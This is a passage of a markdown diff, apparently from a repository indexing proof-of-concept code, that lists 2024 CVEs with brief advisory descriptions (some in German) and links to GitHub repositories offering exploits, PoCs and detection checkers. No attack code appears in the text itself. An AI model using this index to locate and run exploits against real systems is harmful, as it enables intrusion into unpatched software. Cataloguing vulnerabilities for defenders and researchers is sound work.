+### CVE-2024-0305 (2024-01-08) + +Eine Schwachstelle wurde in Guangzhou Yingke Electronic Technology Ncast bis 2017 gefunden. Sie wurde als problematisch eingestuft. Dies betrifft einen unbekannten Teil der Datei /manage/IPSetup.php der Komponente Guest Login. Durch das Manipulieren mit unbekannten Daten kann eine information disclosure-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk passieren. Der Exploit steht zur öffentlichen Verfügung. + + +- [jidle123/cve-2024-0305exp](https://github.com/jidle123/cve-2024-0305exp) + +### CVE-2024-0311 (2024-03-14) + +A malicious insider can bypass the existing policy of Skyhigh Client Proxy without a valid release code. + + +- [calligraf0/CVE-2024-0311](https://github.com/calligraf0/CVE-2024-0311) + +### CVE-2024-0324 (2024-02-05) + +The User Profile Builder – Beautiful User Registration Forms, User Profiles & User Role Editor plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'wppb_two_factor_authentication_settings_update' function in all versions up to, and including, 3.10.8. This makes it possible for unauthenticated attackers to enable or disable the 2FA functionality present in the Premium version of the plugin for arbitrary user roles. + + +- [kodaichodai/CVE-2024-0324](https://github.com/kodaichodai/CVE-2024-0324) + +### CVE-2024-0352 (2024-01-09) + +In Likeshop bis 2.5.7.20210311 wurde eine Schwachstelle entdeckt. Sie wurde als kritisch eingestuft. Es geht um die Funktion FileServer::userFormImage der Datei server/application/api/controller/File.php der Komponente HTTP POST Request Handler. Mit der Manipulation des Arguments file mit unbekannten Daten kann eine unrestricted upload-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk erfolgen. Der Exploit steht zur öffentlichen Verfügung. + + +- [Cappricio-Securities/CVE-2024-0352](https://github.com/Cappricio-Securities/CVE-2024-0352) + +### CVE-2024-0379 (2024-02-20) + +The Custom Twitter Feeds – A Tweets Widget or X Feed Widget plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.2.1. This is due to missing or incorrect nonce validation on the ctf_auto_save_tokens function. This makes it possible for unauthenticated attackers to update the site's twitter API token and secret via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + + +- [kodaichodai/CVE-2024-0379](https://github.com/kodaichodai/CVE-2024-0379) + +### CVE-2024-0399 (2024-04-15) + +The WooCommerce Customers Manager WordPress plugin before 29.7 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to an SQL injection exploitable by Subscriber+ role. + + +- [xbz0n/CVE-2024-0399](https://github.com/xbz0n/CVE-2024-0399) + +### CVE-2024-0507 (2024-01-16) + +An attacker with access to a Management Console user account with the editor role could escalate privileges through a command injection vulnerability in the Management Console. This vulnerability affected all versions of GitHub Enterprise Server and was fixed in versions 3.11.3, 3.10.5, 3.9.8, and 3.8.13 This vulnerability was reported via the GitHub Bug Bounty program. + + +- [convisolabs/CVE-2024-0507_CVE-2024-0200-github](https://github.com/convisolabs/CVE-2024-0507_CVE-2024-0200-github) + +### CVE-2024-0509 (2024-02-05) + +The WP 404 Auto Redirect to Similar Post plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘request’ parameter in all versions up to, and including, 1.0.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + + +- [kodaichodai/CVE-2024-0509](https://github.com/kodaichodai/CVE-2024-0509) + +### CVE-2024-0566 (2024-02-12) + +The Smart Manager WordPress plugin before 8.28.0 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin. + + +- [xbz0n/CVE-2024-0566](https://github.com/xbz0n/CVE-2024-0566) + +### CVE-2024-0582 (2024-01-16) + +A memory leak flaw was found in the Linux kernel’s io_uring functionality in how a user registers a buffer ring with IORING_REGISTER_PBUF_RING, mmap() it, and then frees it. This flaw allows a local user to crash or potentially escalate their privileges on the system. + + +- [ysanatomic/io_uring_LPE-CVE-2024-0582](https://github.com/ysanatomic/io_uring_LPE-CVE-2024-0582) +- [Forsaken0129/CVE-2024-0582](https://github.com/Forsaken0129/CVE-2024-0582) +- [0ptyx/cve-2024-0582](https://github.com/0ptyx/cve-2024-0582) +- [geniuszly/CVE-2024-0582](https://github.com/geniuszly/CVE-2024-0582) +- [101010zyl/CVE-2024-0582](https://github.com/101010zyl/CVE-2024-0582) + +### CVE-2024-0588 (2024-04-09) + +The Paid Memberships Pro – Content Restriction, User Registration, & Paid Subscriptions plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.12.10. This is due to missing nonce validation on the pmpro_lifter_save_streamline_option() function. This makes it possible for unauthenticated attackers to enable the streamline setting with Lifter LMS via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + + +- [kodaichodai/CVE-2024-0588](https://github.com/kodaichodai/CVE-2024-0588) + +### CVE-2024-0590 (2024-02-20) + +The Microsoft Clarity plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 0.9.3. This is due to missing nonce validation on the edit_clarity_project_id() function. This makes it possible for unauthenticated attackers to change the project id and add malicious JavaScript via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + + +- [kodaichodai/CVE-2024-0590](https://github.com/kodaichodai/CVE-2024-0590) + +### CVE-2024-0623 (2024-01-20) + +The VK Block Patterns plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.31.1.1. This is due to missing or incorrect nonce validation on the vbp_clear_patterns_cache() function. This makes it possible for unauthenticated attackers to clear the patterns cache via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + + +- [kodaichodai/CVE-2024-0623](https://github.com/kodaichodai/CVE-2024-0623) + +### CVE-2024-0624 (2024-01-25) + +The Paid Memberships Pro – Content Restriction, User Registration, & Paid Subscriptions plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.12.7. This is due to missing or incorrect nonce validation on the pmpro_update_level_order() function. This makes it possible for unauthenticated attackers to update the order of levels via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + + +- [kodaichodai/CVE-2024-0624](https://github.com/kodaichodai/CVE-2024-0624) + +### CVE-2024-0679 (2024-01-20) + +The ColorMag theme for WordPress is vulnerable to unauthorized access due to a missing capability check on the plugin_action_callback() function in all versions up to, and including, 3.1.2. This makes it possible for authenticated attackers, with subscriber-level access and above, to install and activate arbitrary plugins. + + +- [RandomRobbieBF/CVE-2024-0679](https://github.com/RandomRobbieBF/CVE-2024-0679) + +### CVE-2024-0683 (2024-03-13) + +The Bulgarisation for WooCommerce plugin for WordPress is vulnerable to unauthorized access due to missing capability checks on several functions in all versions up to, and including, 3.0.14. This makes it possible for unauthenticated and authenticated attackers, with subscriber-level access and above, to generate and delete labels. + + +- [3474458191/CVE-2024-0683](https://github.com/3474458191/CVE-2024-0683) + +### CVE-2024-0684 (2024-02-06) + +A flaw was found in the GNU coreutils "split" program. A heap overflow with user-controlled data of multiple hundred bytes in length could occur in the line_bytes_split() function, potentially leading to an application crash and denial of service. + + +- [Valentin-Metz/writeup_split](https://github.com/Valentin-Metz/writeup_split) + +### CVE-2024-0710 (2024-05-02) + +The GP Unique ID plugin for WordPress is vulnerable to Unique ID Modification in all versions up to, and including, 1.5.5. This is due to insufficient input validation. This makes it possible for unauthenticated attackers to tamper with the generation of a unique ID on a form submission and replace the generated unique ID with a user-controlled one, leading to a loss of integrity in cases where the ID's uniqueness is relied upon in a security-specific context. + + +- [karlemilnikka/CVE-2024-0710](https://github.com/karlemilnikka/CVE-2024-0710) + +### CVE-2024-0713 +- [kitodd/CVE-2024-0713](https://github.com/kitodd/CVE-2024-0713) + +### CVE-2024-0741 (2024-01-23) + +An out of bounds write in ANGLE could have allowed an attacker to corrupt memory leading to a potentially exploitable crash. This vulnerability affects Firefox < 122, Firefox ESR < 115.7, and Thunderbird < 115.7. + + +- [HyHy100/Firefox-ANGLE-CVE-2024-0741](https://github.com/HyHy100/Firefox-ANGLE-CVE-2024-0741) + +### CVE-2024-0757 (2024-06-04) + +The Insert or Embed Articulate Content into WordPress plugin through 4.3000000023 is not properly filtering which file extensions are allowed to be imported on the server, allowing the uploading of malicious code within zip files + + +- [hunThubSpace/CVE-2024-0757-Exploit](https://github.com/hunThubSpace/CVE-2024-0757-Exploit) + +### CVE-2024-0762 (2024-05-14) + +Potential buffer overflow \nin unsafe UEFI variable handling \n\nin Phoenix SecureCore™ for select Intel platforms\n\nThis issue affects:\n\nPhoenix \n\nSecureCore™ for Intel Kaby Lake: from 4.0.1.1 before 4.0.1.998;\n\nPhoenix \n\nSecureCore™ for Intel Coffee Lake: from 4.1.0.1 before 4.1.0.562;\n\nPhoenix \n\nSecureCore™ for Intel Ice Lake: from 4.2.0.1 before 4.2.0.323;\n\nPhoenix \n\nSecureCore™ for Intel Comet Lake: from 4.2.1.1 before 4.2.1.287;\n\nPhoenix \n\nSecureCore™ for Intel Tiger Lake: from 4.3.0.1 before 4.3.0.236;\n\nPhoenix \n\nSecureCore™ for Intel Jasper Lake: from 4.3.1.1 before 4.3.1.184;\n\nPhoenix \n\nSecureCore™ for Intel Alder Lake: from 4.4.0.1 before 4.4.0.269;\n\nPhoenix \n\nSecureCore™ for Intel Raptor Lake: from 4.5.0.1 before 4.5.0.218;\n\nPhoenix \n\nSecureCore™ for Intel Meteor Lake: from 4.5.1.1 before 4.5.1.15.\n\n + + +- [tadash10/Detect-CVE-2024-0762](https://github.com/tadash10/Detect-CVE-2024-0762) + +### CVE-2024-0783 (2024-01-22) + +Eine kritische Schwachstelle wurde in Project Worlds Online Admission System 1.0 gefunden. Hierbei geht es um eine nicht exakt ausgemachte Funktion der Datei documents.php. Durch Manipulieren mit unbekannten Daten kann eine unrestricted upload-Schwachstelle ausgenutzt werden. Umgesetzt werden kann der Angriff über das Netzwerk. Der Exploit steht zur öffentlichen Verfügung. + + +- [keru6k/Online-Admission-System-RCE-PoC](https://github.com/keru6k/Online-Admission-System-RCE-PoC) + +### CVE-2024-0944 (2024-01-26) + +Eine problematische Schwachstelle wurde in Totolink T8 4.1.5cu.833_20220905 ausgemacht. Betroffen davon ist ein unbekannter Prozess der Datei /cgi-bin/cstecgi.cgi. Mit der Manipulation mit unbekannten Daten kann eine session expiration-Schwachstelle ausgenutzt werden. Die Umsetzung des Angriffs kann dabei über das Netzwerk erfolgen. Die Komplexität eines Angriffs ist eher hoch. Sie ist schwierig ausnutzbar. Der Exploit steht zur öffentlichen Verfügung. + + +- [Artemisxxx37/cve-2024-0944](https://github.com/Artemisxxx37/cve-2024-0944) + +### CVE-2024-0986 (2024-01-28) + +Eine Schwachstelle wurde in Issabel PBX 4.0.0 ausgemacht. Sie wurde als kritisch eingestuft. Es geht hierbei um eine nicht näher spezifizierte Funktion der Datei /index.php?menu=asterisk_cli der Komponente Asterisk-Cli. Durch Beeinflussen des Arguments Command mit unbekannten Daten kann eine os command injection-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk angegangen werden. Der Exploit steht zur öffentlichen Verfügung. + + +- [gunzf0x/Issabel-PBX-4.0.0-RCE-Authenticated](https://github.com/gunzf0x/Issabel-PBX-4.0.0-RCE-Authenticated) + +### CVE-2024-436 +- [Julian-gmz/CVE-2024-436_Exploit](https://github.com/Julian-gmz/CVE-2024-436_Exploit) + +### CVE-2024-1071 (2024-03-13) + +The Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin plugin for WordPress is vulnerable to SQL Injection via the 'sorting' parameter in versions 2.1.3 to 2.8.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + + +- [gbrsh/CVE-2024-1071](https://github.com/gbrsh/CVE-2024-1071) +- [Trackflaw/CVE-2024-1071-Docker](https://github.com/Trackflaw/CVE-2024-1071-Docker) +- [Matrexdz/CVE-2024-1071](https://github.com/Matrexdz/CVE-2024-1071) +- [Matrexdz/CVE-2024-1071-Docker](https://github.com/Matrexdz/CVE-2024-1071-Docker) +- [gh-ost00/CVE-2024-1071-SQL-Injection](https://github.com/gh-ost00/CVE-2024-1071-SQL-Injection) +- [Dogu589/WordPress-Exploit-CVE-2024-1071](https://github.com/Dogu589/WordPress-Exploit-CVE-2024-1071) +- [Spid3heX/CVE-2024-1071-PoC-Script](https://github.com/Spid3heX/CVE-2024-1071-PoC-Script) + +### CVE-2024-1086 (2024-01-31) + +A use-after-free vulnerability in the Linux kernel's netfilter: nf_tables component can be exploited to achieve local privilege escalation.\n\nThe nft_verdict_init() function allows positive values as drop error within the hook verdict, and hence the nf_hook_slow() function can cause a double free vulnerability when NF_DROP is issued with a drop error which resembles NF_ACCEPT.\n\nWe recommend upgrading past commit f342de4e2f33e0e39165d8639387aa6c19dff660.\n\n + + +- [Notselwyn/CVE-2024-1086](https://github.com/Notselwyn/CVE-2024-1086) +- [Alicey0719/docker-POC_CVE-2024-1086](https://github.com/Alicey0719/docker-POC_CVE-2024-1086) +- [CCIEVoice2009/CVE-2024-1086](https://github.com/CCIEVoice2009/CVE-2024-1086) +- [kevcooper/CVE-2024-1086-checker](https://github.com/kevcooper/CVE-2024-1086-checker) +- [feely666/CVE-2024-1086](https://github.com/feely666/CVE-2024-1086) +- [xzx482/CVE-2024-1086](https://github.com/xzx482/CVE-2024-1086) +- [LLfam/CVE-2024-1086](https://github.com/LLfam/CVE-2024-1086) + +### CVE-2024-1112 (2024-01-31) + +Heap-based buffer overflow vulnerability in Resource Hacker, developed by Angus Johnson, affecting version 3.6.0.92. This vulnerability could allow an attacker to execute arbitrary code via a long filename argument. + + +- [enessakircolak/CVE-2024-1112](https://github.com/enessakircolak/CVE-2024-1112) + +### CVE-2024-1207 (2024-02-08) + +The WP Booking Calendar plugin for WordPress is vulnerable to SQL Injection via the 'calendar_request_params[dates_ddmmyy_csv]' parameter in all versions up to, and including, 9.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + + +- [sahar042/CVE-2024-1207](https://github.com/sahar042/CVE-2024-1207) + +### CVE-2024-1208 (2024-02-05) + +The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.2 via API. This makes it possible for unauthenticated attackers to obtain access to quiz questions. + + +- [karlemilnikka/CVE-2024-1208-and-CVE-2024-1210](https://github.com/karlemilnikka/CVE-2024-1208-and-CVE-2024-1210) +- [Cappricio-Securities/CVE-2024-1208](https://github.com/Cappricio-Securities/CVE-2024-1208) + +### CVE-2024-1209 (2024-02-05) + +The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.1 via direct file access due to insufficient protection of uploaded assignments. This makes it possible for unauthenticated attackers to obtain those uploads. + + +- [karlemilnikka/CVE-2024-1209](https://github.com/karlemilnikka/CVE-2024-1209) + +### CVE-2024-1212 (2024-02-21) + +Unauthenticated remote attackers can access the system through the LoadMaster management interface, enabling arbitrary system command execution.\n\n\n + + +- [Chocapikk/CVE-2024-1212](https://github.com/Chocapikk/CVE-2024-1212) +- [nak000/CVE-2024-1212](https://github.com/nak000/CVE-2024-1212) +- [Rehan07-Human/Exploiting-RCE-Cyber_Project_CVE-2024-1212](https://github.com/Rehan07-Human/Exploiting-RCE-Cyber_Project_CVE-2024-1212) + +### CVE-2024-1269 (2024-02-07) + +In SourceCodester Product Management System 1.0 wurde eine problematische Schwachstelle gefunden. Betroffen ist eine unbekannte Verarbeitung der Datei /supplier.php. Dank Manipulation des Arguments supplier_name/supplier_contact mit unbekannten Daten kann eine cross site scripting-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk passieren. Der Exploit steht zur öffentlichen Verfügung. + + +- [sajaljat/CVE-2024-1269](https://github.com/sajaljat/CVE-2024-1269) + +### CVE-2024-1301 (2024-03-12) + +SQL injection vulnerability in Badger Meter Monitool affecting versions 4.6.3 and earlier. A remote attacker could send a specially crafted SQL query to the server via the j_username parameter and retrieve the information stored in the database. + + +- [guillermogm4/CVE-2024-1301---Badgermeter-moni-tool-SQL-Injection](https://github.com/guillermogm4/CVE-2024-1301---Badgermeter-moni-tool-SQL-Injection) + +### CVE-2024-1302 (2024-03-12) + +Information exposure vulnerability in Badger Meter Monitool affecting versions up to 4.6.3 and earlier. A local attacker could change the application's file parameter to a log file obtaining all sensitive information such as database credentials. + + +- [guillermogm4/CVE-2024-1302---Badgermeter-moni-tool-Sensitive-information-exposure](https://github.com/guillermogm4/CVE-2024-1302---Badgermeter-moni-tool-Sensitive-information-exposure) + +### CVE-2024-1303 (2024-03-12) + +Incorrectly limiting the path to a restricted directory vulnerability in Badger Meter Monitool that affects versions up to 4.6.3 and earlier. This vulnerability allows an authenticated attacker to retrieve any file from the device using the download-file functionality. + + +- [guillermogm4/CVE-2024-1303---Badgermeter-moni-tool-Path-Traversal](https://github.com/guillermogm4/CVE-2024-1303---Badgermeter-moni-tool-Path-Traversal) + +### CVE-2024-1304 (2024-03-12) + +Cross-site scripting vulnerability in Badger Meter Monitool that affects versions up to 4.6.3 and earlier. This vulnerability allows a remote attacker to send a specially crafted javascript payload to an authenticated user and partially hijack their browser session. + + +- [guillermogm4/CVE-2024-1304---Badgermeter-moni-tool-Reflected-Cross-Site-Scripting-XSS](https://github.com/guillermogm4/CVE-2024-1304---Badgermeter-moni-tool-Reflected-Cross-Site-Scripting-XSS) + +### CVE-2024-1346 (2024-02-19) + +Weak MySQL database root password in LaborOfficeFree affects version 19.10. This vulnerability allows an attacker to calculate the root password of the MySQL database used by LaborOfficeFree using two constants. + + +- [PeterGabaldon/CVE-2024-1346](https://github.com/PeterGabaldon/CVE-2024-1346) + +### CVE-2024-1380 (2024-03-13) + +The Relevanssi – A Better Search plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the relevanssi_export_log_check() function in all versions up to, and including, 4.22.0. This makes it possible for unauthenticated attackers to export the query log data. The vendor has indicated that they may look into adding a capability check for proper authorization control, however, this vulnerability is theoretically patched as is. + + +- [RandomRobbieBF/CVE-2024-1380](https://github.com/RandomRobbieBF/CVE-2024-1380) + +### CVE-2024-1403 (2024-02-27) + +In OpenEdge Authentication Gateway and AdminServer prior to 11.7.19, 12.2.14, 12.8.1 on all platforms supported by the OpenEdge product, an authentication bypass vulnerability has been identified.  The\nvulnerability is a bypass to authentication based on a failure to properly\nhandle username and password. Certain unexpected\ncontent passed into the credentials can lead to unauthorized access without proper\nauthentication.   \n\n\n\n\n\n\n + + +- [horizon3ai/CVE-2024-1403](https://github.com/horizon3ai/CVE-2024-1403) + +### CVE-2024-1441 (2024-03-11) + +An off-by-one error flaw was found in the udevListInterfacesByStatus() function in libvirt when the number of interfaces exceeds the size of the `names` array. This issue can be reproduced by sending specially crafted data to the libvirt daemon, allowing an unprivileged client to perform a denial of service attack by causing the libvirt daemon to crash. + + +- [almkuznetsov/CVE-2024-1441](https://github.com/almkuznetsov/CVE-2024-1441) + +### CVE-2024-1512 (2024-02-17) + +The MasterStudy LMS WordPress Plugin – for Online Courses and Education plugin for WordPress is vulnerable to union based SQL Injection via the 'user' parameter of the /lms/stm-lms/order/items REST route in all versions up to, and including, 3.2.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + + +- [rat-c/CVE-2024-1512](https://github.com/rat-c/CVE-2024-1512) + +### CVE-2024-1561 (2024-04-16) + +An issue was discovered in gradio-app/gradio, where the `/component_server` endpoint improperly allows the invocation of any method on a `Component` class with attacker-controlled arguments. Specifically, by exploiting the `move_resource_to_block_cache()` method of the `Block` class, an attacker can copy any file on the filesystem to a temporary directory and subsequently retrieve it. This vulnerability enables unauthorized local file read access, posing a significant risk especially when the application is exposed to the internet via `launch(share=True)`, thereby allowing remote attackers to read files on the host machine. Furthermore, gradio apps hosted on `huggingface.co` are also affected, potentially leading to the exposure of sensitive information such as API keys and credentials stored in environment variables. + + +- [DiabloHTB/CVE-2024-1561](https://github.com/DiabloHTB/CVE-2024-1561) +- [DiabloHTB/Nuclei-Template-CVE-2024-1561](https://github.com/DiabloHTB/Nuclei-Template-CVE-2024-1561) + +### CVE-2024-1651 (2024-02-19) + +Torrentpier version 2.4.1 allows executing arbitrary commands on the server.\n\nThis is possible because the application is vulnerable to insecure deserialization.\n\n\n\n\n + + +- [sharpicx/CVE-2024-1651-PoC](https://github.com/sharpicx/CVE-2024-1651-PoC) +- [hy011121/CVE-2024-1651-exploit-RCE](https://github.com/hy011121/CVE-2024-1651-exploit-RCE) +- [Whiteh4tWolf/CVE-2024-1651-PoC](https://github.com/Whiteh4tWolf/CVE-2024-1651-PoC) + +### CVE-2024-1655 (2024-04-15) + +Certain ASUS WiFi routers models has an OS Command Injection vulnerability, allowing an authenticated remote attacker to execute arbitrary system commands by sending a specially crafted request. + + +- [lnversed/CVE-2024-1655](https://github.com/lnversed/CVE-2024-1655) + +### CVE-2024-1698 (2024-02-27) + +The NotificationX – Best FOMO, Social Proof, WooCommerce Sales Popup & Notification Bar Plugin With Elementor plugin for WordPress is vulnerable to SQL Injection via the 'type' parameter in all versions up to, and including, 2.8.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + + +- [kamranhasan/CVE-2024-1698-Exploit](https://github.com/kamranhasan/CVE-2024-1698-Exploit) +- [shanglyu/CVE-2024-1698](https://github.com/shanglyu/CVE-2024-1698) +- [jesicatjan/WordPress-NotificationX-CVE-2024-1698](https://github.com/jesicatjan/WordPress-NotificationX-CVE-2024-1698) + +### CVE-2024-1709 (2024-02-21) + +ConnectWise ScreenConnect 23.9.7 and prior are affected by an Authentication Bypass Using an Alternate Path or Channel\n\n vulnerability, which may allow an attacker direct access to confidential information or \n\ncritical systems.\n\n + + +- [W01fh4cker/ScreenConnect-AuthBypass-RCE](https://github.com/W01fh4cker/ScreenConnect-AuthBypass-RCE) +- [HussainFathy/CVE-2024-1709](https://github.com/HussainFathy/CVE-2024-1709) +- [sxyrxyy/CVE-2024-1709-ConnectWise-ScreenConnect-Authentication-Bypass](https://github.com/sxyrxyy/CVE-2024-1709-ConnectWise-ScreenConnect-Authentication-Bypass) +- [cjybao/CVE-2024-1709-and-CVE-2024-1708](https://github.com/cjybao/CVE-2024-1709-and-CVE-2024-1708) +- [AhmedMansour93/Event-ID-229-Rule-Name-SOC262-CVE-2024-1709-](https://github.com/AhmedMansour93/Event-ID-229-Rule-Name-SOC262-CVE-2024-1709-) +- [AMRICHASFUCK/Mass-CVE-2024-1709](https://github.com/AMRICHASFUCK/Mass-CVE-2024-1709) + +### CVE-2024-1781 (2024-02-23) + +Eine Schwachstelle wurde in Totolink X6000R AX3000 9.4.0cu.852_20230719 ausgemacht. Sie wurde als kritisch eingestuft. Betroffen davon ist die Funktion setWizardCfg der Datei /cgi-bin/cstecgi.cgi der Komponente shttpd. Dank der Manipulation mit unbekannten Daten kann eine command injection-Schwachstelle ausgenutzt werden. Der Exploit steht zur öffentlichen Verfügung. + + +- [Icycu123/CVE-2024-1781](https://github.com/Icycu123/CVE-2024-1781) + +### CVE-2024-1874 (2024-04-29) + +In PHP versions 8.1.* before 8.1.28, 8.2.* before 8.2.18, 8.3.* before 8.3.5, when using proc_open() command with array syntax, due to insufficient escaping, if the arguments of the executed command are controlled by a malicious user, the user can supply arguments that would execute arbitrary commands in Windows shell. \n\n + + +- [ox1111/-CVE-2024-1874-](https://github.com/ox1111/-CVE-2024-1874-) +- [Tgcohce/CVE-2024-1874](https://github.com/Tgcohce/CVE-2024-1874) + +### CVE-2024-1931 (2024-03-07) + +NLnet Labs Unbound version 1.18.0 up to and including version 1.19.1 contain a vulnerability that can cause denial of service by a certain code path that can lead to an infinite loop. Unbound 1.18.0 introduced a feature that removes EDE records from responses with size higher than the client's advertised buffer size. Before removing all the EDE records however, it would try to see if trimming the extra text fields on those records would result in an acceptable size while still retaining the EDE codes. Due to an unchecked condition, the code that trims the text of the EDE records could loop indefinitely. This happens when Unbound would reply with attached EDE information on a positive reply and the client's buffer size is smaller than the needed space to include EDE records. The vulnerability can only be triggered when the 'ede: yes' option is used; non default configuration. From version 1.19.2 on, the code is fixed to avoid looping indefinitely. + + +- [passer12/CVE-2024-1931-reproduction](https://github.com/passer12/CVE-2024-1931-reproduction) + +### CVE-2024-1939 (2024-02-29) + +Type Confusion in V8 in Google Chrome prior to 122.0.6261.94 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) + + +- [rycbar77/CVE-2024-1939](https://github.com/rycbar77/CVE-2024-1939) + +### CVE-2024-2054 (2024-03-05) + +The Artica-Proxy administrative web application will deserialize arbitrary PHP objects supplied by unauthenticated users and subsequently enable code execution as the "www-data" user. + + +- [Madan301/CVE-2024-2054](https://github.com/Madan301/CVE-2024-2054) + +### CVE-2024-2074 (2024-03-01) + +Eine kritische Schwachstelle wurde in Mini-Tmall bis 20231017 gefunden. Hierbei geht es um eine nicht exakt ausgemachte Funktion der Datei ?r=tmall/admin/user/1/1. Mit der Manipulation des Arguments orderBy mit unbekannten Daten kann eine sql injection-Schwachstelle ausgenutzt werden. Umgesetzt werden kann der Angriff über das Netzwerk. Der Exploit steht zur öffentlichen Verfügung. + + +- [yuziiiiiiiiii/CVE-2024-2074](https://github.com/yuziiiiiiiiii/CVE-2024-2074) + +### CVE-2024-2169 (2024-03-19) + +Implementations of UDP application protocol are vulnerable to network loops. An unauthenticated attacker can use maliciously-crafted packets against a vulnerable implementation that can lead to Denial of Service (DOS) and/or abuse of resources. + + +- [douglasbuzatto/G3-Loop-DoS](https://github.com/douglasbuzatto/G3-Loop-DoS) + +### CVE-2024-2188 (2024-03-05) + +Cross-Site Scripting (XSS) vulnerability stored in TP-Link Archer AX50 affecting firmware version 1.0.11 build 2022052. This vulnerability could allow an unauthenticated attacker to create a port mapping rule via a SOAP request and store a malicious JavaScript payload within that rule, which could result in an execution of the JavaScript payload when the rule is loaded. + + +- [hacefresko/CVE-2024-2188](https://github.com/hacefresko/CVE-2024-2188) + +### CVE-2024-2193 (2024-03-15) + +A Speculative Race Condition (SRC) vulnerability that impacts modern CPU architectures supporting speculative execution (related to Spectre V1) has been disclosed. An unauthenticated attacker can exploit this vulnerability to disclose arbitrary data from the CPU using race conditions to access the speculative executable code paths. + + +- [uthrasri/CVE-2024-2193](https://github.com/uthrasri/CVE-2024-2193) + +### CVE-2024-2242 (2024-03-13) + +The Contact Form 7 plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘active-tab’ parameter in all versions up to, and including, 5.9 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + + +- [RandomRobbieBF/CVE-2024-2242](https://github.com/RandomRobbieBF/CVE-2024-2242) + +### CVE-2024-2257 (2024-05-10) + +This vulnerability exists in Digisol Router (DG-GR1321: Hardware version 3.7L; Firmware version : v3.2.02) due to improper implementation of password policies. An attacker with physical access could exploit this by creating password that do not adhere to the defined security standards/policy on the vulnerable system.\n\nSuccessful exploitation of this vulnerability could allow the attacker to expose the router to potential security threats. + + +- [Redfox-Secuirty/Digisol-DG-GR1321-s-Password-Policy-Bypass-CVE-2024-2257](https://github.com/Redfox-Secuirty/Digisol-DG-GR1321-s-Password-Policy-Bypass-CVE-2024-2257) + +### CVE-2024-2389 (2024-04-02) + +In Flowmon versions prior to 11.1.14 and 12.3.5, an operating system command injection vulnerability has been identified.  An unauthenticated user can gain entry to the system via the Flowmon management interface, allowing for the execution of arbitrary system commands.\n\n + + +- [adhikara13/CVE-2024-2389](https://github.com/adhikara13/CVE-2024-2389) + +### CVE-2024-2432 (2024-03-13) + +A privilege escalation (PE) vulnerability in the Palo Alto Networks GlobalProtect app on Windows devices enables a local user to execute programs with elevated privileges. However, execution requires that the local user is able to successfully exploit a race condition. + + +- [Hagrid29/CVE-2024-2432-PaloAlto-GlobalProtect-EoP](https://github.com/Hagrid29/CVE-2024-2432-PaloAlto-GlobalProtect-EoP) + +### CVE-2024-2667 (2024-05-02) + +The InstaWP Connect – 1-click WP Staging & Migration plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file validation in the /wp-json/instawp-connect/v1/config REST API endpoint in all versions up to, and including, 0.1.0.22. This makes it possible for unauthenticated attackers to upload arbitrary files. + + +- [Puvipavan/CVE-2024-2667](https://github.com/Puvipavan/CVE-2024-2667) +- [Nxploited/CVE-2024-2667-Poc](https://github.com/Nxploited/CVE-2024-2667-Poc) + +### CVE-2024-2876 (2024-05-02) + +The Email Subscribers by Icegram Express – Email Marketing, Newsletters, Automation for WordPress & WooCommerce plugin for WordPress is vulnerable to SQL Injection via the 'run' function of the 'IG_ES_Subscribers_Query' class in all versions up to, and including, 5.7.14 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + + +- [c0d3zilla/CVE-2024-2876](https://github.com/c0d3zilla/CVE-2024-2876) +- [Quantum-Hacker/CVE-2024-2876](https://github.com/Quantum-Hacker/CVE-2024-2876) +- [0xAgun/CVE-2024-2876](https://github.com/0xAgun/CVE-2024-2876) +- [skyrowalker/CVE-2024-2876](https://github.com/skyrowalker/CVE-2024-2876) +- [issamjr/CVE-2024-2876](https://github.com/issamjr/CVE-2024-2876) + +### CVE-2024-2879 (2024-04-03) + +The LayerSlider plugin for WordPress is vulnerable to SQL Injection via the ls_get_popup_markup action in versions 7.9.11 and 7.10.0 due to insufficient escaping on the user supplied parameter and lack 